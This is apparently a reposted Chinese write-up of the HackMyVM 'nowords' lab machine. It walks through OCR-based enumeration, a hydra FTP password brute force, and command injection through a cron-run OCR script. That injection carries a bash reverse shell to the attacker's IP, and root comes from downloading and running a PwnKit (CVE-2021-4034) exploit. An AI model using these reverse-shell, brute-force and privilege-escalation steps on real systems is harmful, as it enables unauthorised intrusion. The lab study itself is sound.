hackmyvm-nowords

starme / 2024-10-15 / 原文

https://hackmyvm.eu/machines/machine.php?vm=nowords

靶机 攻击机
IP 192.168.101.143 192.168.101.183

信息收集

nmap扫描后发现21和80端口打开

源码提示:

<!-- [usernames and passwords are lowercase] -->

然后dirb扫描后发现存在robots.txt

访问后得到了图片,经过OCR扫描后为:

/ewqpoiewopqiewq
/490382490328423
/fdsnmrewrwerew
/uoijfdsijiofds
/rewjlkjsdf
/rwen908098vcxvcx
/kvjciovcuxioufhydsfdsyr
/klvcxhyvcxkljhyvcxiuzxcioyv
/oiufdsaoifndasuiofhdsa
/klhvcoixzuyvxcizoyvzxcuiyv
/pvycuxivhyzxcuivyzxiouvyzxc
/kifjdsaoipfuasoifjasipofudas
/oidfphkljerhwqlkjrheqwkjlh
/mncvmzxoiurewqioyrwqrewqrr
/oiupoiuopiuopiuioyuiyiuyio
/ghasfdhasfdhasdghasfdhgasfdasjf
/nbvnmvnbvnmzxvncvznbxcvznvzx
/vnbewqveqwbmvenqwbvrnwevrhjwefhjvwerj
/hvuixctyvcyuxgivxcyuvfxcyuvigfxc
/uihysaidouyasiudysquidhqiuodhqiudqhiodu
/hfdsioufhdsiuhvcxiuovyhcxiuvgxcivhcxbcviux
/vhsdiufyhdsuivhxcuivhuisdhfids
/jfd9s87fds89cvxyvxc789v6cx
/m98789789ds7a89d7sah98zxc78
/dsaknewiquiodusjadsa
/vcxoiufdsnkjnewq
/vcxjhkluioyfdsrew
/iouoiuvcxvcxfds
/uoihbnnmxcbmxcnbvx
/mdsaydqnfdsoiurewnh
/ioufdosijnmieowryu
/oiufdsnrewjhuiyfsd
/rewnkvoiuxvfdsfdsrwqe
/kuviosjdfiojdsifoyuewhq
/hvioxcuyiofuasdhfkjlsnafoidsy

爆破得:

image-20240219200045027

即路径为

http://192.168.101.143//oiufdsnrewjhuiyfsd

访问后下载得到了oiufdsnrewjhuiyfsd文件

使用file或命令查看是什么文件

image-20240219200747996

发现是jpg文件,然后是OCR扫描得:

Quinn
Brielle
Mary
Nevaeh
Delilah
Athena
Piper
Isla
Andrea
Leilani
Serenity
Katherine
Jasmine
Ruby
Rylee
Willow
Everly
Cora
Josephine
Margaret
Sophie 
Lyla
Kaylee
Ivy
Liliana
Adalyn
Alyssa
Lydia
Jade
Arya
Aubree
Maria
Norah
Khloe
Eliana
Arianna
Taylor
Hadley
Kayla
Melanie
Emery
Eliza
Peyton
Kylie
Eden
Gianna
Isabelle
Natalia
Ariel
Adalynn
Rose
Julia
Valentina
Faith
Annabelle
Melody
Alexis
Nova
Clara
Alexandra
Isabel
Vivian
Ximena
Sydney
Reagan
Brianna
Lauren
Ashley
Juliana
Mackenzie
Raelynn
Iris
Madeline
Bailey
Emerson

然后要将其变为小写:

quinn
brielle
mary
nevaeh
delilah
athena
piper
isla
andrea
leilani
serenity
katherine
jasmine
ruby
rylee
willow
everly
cora
josephine
margaret
sophie 
lyla
kaylee
ivy
liliana
adalyn
alyssa
lydia
jade
arya
aubree
maria
norah
khloe
eliana
arianna
taylor
hadley
kayla
melanie
emery
eliza
peyton
kylie
eden
gianna
isabelle
natalia
ariel
adalynn
rose
julia
valentina
faith
annabelle
melody
alexis
nova
clara
alexandra
isabel
vivian
ximena
sydney
reagan
brianna
lauren
ashley
juliana
mackenzie
raelynn
iris
madeline
bailey
emerson

hydra爆破ftp

然后使用hydra爆破

hydra -l sophie -P 1.txt ftp://192.168.101.143 -V -I -u -f

image-20240219203118512

密码为natalia

进行ftp登录:

apt-get install lftp
lftp 192.168.101.17 -u sophie

这里IP 192.168.101.17原为192.168.101.143

image-20240219223529601

发现有个command.jpg文件,下载下来

https://blog.csdn.net/qq_38526635/article/details/82147980

FTP相关命令

1. 登录FTP服务器
lftp <ip> -u <user>
2. 查看文件
ls dir cd
3. 下载文件
get filename
mget filename1 filename2
4. 上传文件
put:上传指定文件put filename [newname]
send:上传指定文件send filename [newname]
(filename为上传的本地文件名,newname为上传至FTP服务器上时使用的名字,如果不指定newname,文件将以原名上传。)
5. 结束并退出FTP
close:结束与服务器的FTP会话
quit:结束与服务器的FTP会话并退出FTP环境
6.其它
pwd
rename filename newfilename
delete filename
help

发现是png:

file command.jpg
mv command.jpg command.png
gocr command.png

image-20240219224148547

image-20240219224203799

内容为/bin/id

接着来到/home/me目录,发现了doit.py文件

#!/usr/bin/python3
# coding: utf-8

import pytesseract
import os
try:
    import Image, ImageOps, ImageEnhance, imread
except ImportError:
    from PIL import Image, ImageOps, ImageEnhance

def solve_captcha(path):
    captcha = pytesseract.image_to_string(Image.open(path))
    return captcha

# 上面表示识图
  
if __name__ == '__main__':
    text = solve_captcha("/home/sophie/command.jpg")
    a = text.split("\n")
    f = open("/home/sophie/log.txt","w")
    f.write(" Executing: "+text)
    f.close()
    os.system(a[0])

此时:

创建一个叫com的文件,内容为bash -i >& /dev/tcp/192.168.101.183/1234 0>&1,将该文件上传到/home/sophie目录下

创建一个command.png文件,内容为/bin/bash /home/sophie/com,将command.png名字修改为command.jpg

删除FTP服务器上原有的的command.jpg,上传创建的command.jpg

image-20240219230636676

稍等一会儿,会发现kali收到了弹回的shell:

应该是有定时任务定时执行doit.py文件

image-20240219230718601

试了一下gcc命令可用,说明可以编译:

image-20240219231437347

les.sh

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

先下载下来,然后本地起个http服务:

image-20240219234043819

通过wget http://192.168.101.183/les.sh下载les.sh

bash les.sh

image-20240219234204040

选择这个漏洞

wget https://codeload.github.com/berdav/CVE-2021-4034/zip/main
unzip main
cd CVE-2021-4034-main
make
./cve-2021-4034

image-20240219235921439

修饰shell

image-20240220000424664

/usr/bin/script -qc /bin/bash /dev/null
ctrl+z

stty raw -echo;fg

reset
xterm

结果:

image-20240220000642993

果然好用。

参考

https://www.bilibili.com/video/BV1JC4y1F75o?t=2.3

hackmyvm-nowords更多相关文章

今日报告-66

设置Windows10暂停更新3000天

AQS公平锁的流程

AMD锐龙7 7800X3D网游专项测试:竟比i9-13900KS强了15%

常用总线技术基本参数对比

探索图像数据中的隐藏信息:语义实体识别和关系抽取的奇妙之旅

设置Chrome浏览器自动升级

JavaScript – 小技巧 Tips

Winform无边框窗体实现拖动

STM32基础(一)

技术人的修炼---九五小庞

vue自定义事件用法及$emit

ODOO 科目配置4

sqlite 触发器 c#

postgresql在插入数据后怎么获取自增id

EF Core 的基本使用

error: failed to push some refs to 'https://github.com/*******/********.github.io.git'

欧拉降幂

编程语言能力对比

基于机器视觉的小车轨迹控制软件界面展示

随机推荐

step7 V5.x上的SCL

yolo --- 核心思想

【游记】CCPC 济南 2024 游记

AJAX & AXIOS-2024/11/1

验证码处理在自动化测试中的应用

一些学科笑话

NOIP2024模拟赛20 & 11.1 小记

20241101 数据结构与算法期中机试收获

Java,启动!

什么是IT技术

即将到来!

2024/11/1日 日志 关于JavaScript简介&引入方式 以及基础语法的学习

舍得-时间-工作是人的一生最重要的事情-自己要有私房钱-人的一生最重要的事情是书写自己的人生

2.TiUP 部署 DM 集群

原型模式的C++实现

python bytecode解析

09-XSS键盘监听、cookie窃取&文件上传绕过

ubuntu 24.04 部署 mysql 8.4.3 LTS

国标GB28181公网平台LiteGBS国标GB28181视频平台建筑工地无线视频联网监控系统方案

imes完工下线

热门话题

Ethernaut Level 11: Elevator Attack and Blockchain Interaction

快速部署开源spug运维平台的Docker安装指南

驱动调试之printk的原理与使用

计算机思维模型及其应用

华为云发布代码大模型PanGu-Coder2,实现高效代码生成

Linux多硬盘数据存储和分区操作

构建高可用架构: 分层冗余与自动故障转移

LoRA:高效调参的大语言模型适应方法

《分布式系统的基本原理及互联网分层架构的本质》

Hadoop写流程解析

Java架构师的系统架构设计方法论中的规范要点

使用observeDOM解决BetterScroll插件在移动端无法滑动的问题

互联网一致性架构设计实践

高并发系统架构与水平扩展

混合应用的崛起:跨平台开发取代原生应用

  穗舟网 (www.seizhou.com)

本站除标明"本站原创"外所有文章版权归创作人所有,本站不承担任何法律责任和连带责任,如有冒犯请直接联系,我们将立即予以纠正并致歉。

Powered by WordPress  ·  v1.0.0-alpha